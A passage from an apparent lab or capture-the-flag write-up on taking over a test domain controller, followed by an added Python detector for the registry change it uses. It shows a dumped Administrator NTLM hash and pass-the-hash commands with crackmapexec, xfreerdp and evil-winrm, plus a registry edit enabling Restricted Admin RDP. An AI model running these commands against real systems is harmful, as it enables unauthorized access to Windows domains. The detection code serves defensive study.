Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea:::
aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea
 

Getting the Flag

 
└─$ crackmapexec smb 172.16.1.200 -u 'Administrator' -H 8f6aaf1438d78c89c4636179e3ae18ea
SMB         172.16.1.200    445    DC0              [*] Windows 10.0 Build 17763 x64 (name:DC0) (domain:LAB.OFFSHORE.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.1.200    445    DC0              [+] LAB.OFFSHORE.LOCAL\Administrator:8f6aaf1438d78c89c4636179e3ae18ea (Pwn3d!)
 

Logging in

 
└─$ xfreerdp /u:Administrator /v:172.16.1.200 /pth:8f6aaf1438d78c89c4636179e3ae18ea /d:lab.offshore.local 

Removing Admin Restrictions

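Logging in using evil-winrm
evil-winrm -i 172.16.1.200 -u 'Administrator' -H 8f6aaf1438d78c89c4636179e3ae18ea  /domain:lab.offshore.local
Removing Admin Restrictions (setting DisableRestrictedAdmin to 0 enables Restricted Admin mode, which the xfreerdp /pth login above depends on)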
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
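
Added example, not part of the original write-up: setting DisableRestrictedAdmin to 0 makes the host accept RDP logons authenticated with an NT hash, so defenders can alert on that write in process-creation logs. The code below flags it across reg.exe and PowerShell variants; the (host, command line) record shape, the host names and every sample line except the first are constructed assumptions.

```python
import re

# Lsa key itself (not a subkey), under HKLM / HKLM: / HKEY_LOCAL_MACHINE and any control set.
LSA_KEY = re.compile(
    r"(?:hklm:?|hkey_local_machine)\\system\\(?:currentcontrolset|controlset\d{3})"
    r"\\control\\lsa(?![\\\w])", re.I)
VALUE_NAME = re.compile(r"\bDisableRestrictedAdmin\b", re.I)
# Data of zero: reg.exe "/d 0", "/d 0x0", or PowerShell "-Value 0"; quotes optional.
ZERO_DATA = re.compile(r"(?:/d|-value)\s+[\"']?(?:0x)?0+[\"']?(?=\s|$)", re.I)


def enables_restricted_admin(cmdline):
    """True if the command line writes DisableRestrictedAdmin = 0 under the Lsa key."""
    return bool(LSA_KEY.search(cmdline)
                and VALUE_NAME.search(cmdline)
                and ZERO_DATA.search(cmdline))


def scan(events):
    """Return the (host, cmdline) pairs that should raise an alert."""
    return [(host, cmd) for host, cmd in events if enables_restricted_admin(cmd)]


# Constructed process-creation records (host, command line); only the first
# command line is taken from the write-up, the rest are made-up variants.
SAMPLE_EVENTS = [
    ("HOST-A", r"reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f"),
    ("HOST-B", r'reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'),
    ("HOST-C", r"powershell New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name DisableRestrictedAdmin -Value 0 -PropertyType DWord"),
    # Writing 1 turns the mode back off, and a query changes nothing: no alert.
    ("HOST-D", r"reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f"),
    ("HOST-E", r"reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin"),
]

if __name__ == "__main__":
    for host, cmd in scan(SAMPLE_EVENTS):
        print(f"ALERT {host}: Restricted Admin mode enabled via: {cmd}")
```

Command-line matching misses writes made through the registry API or remote registry, so pair it with registry-value auditing on the Lsa key.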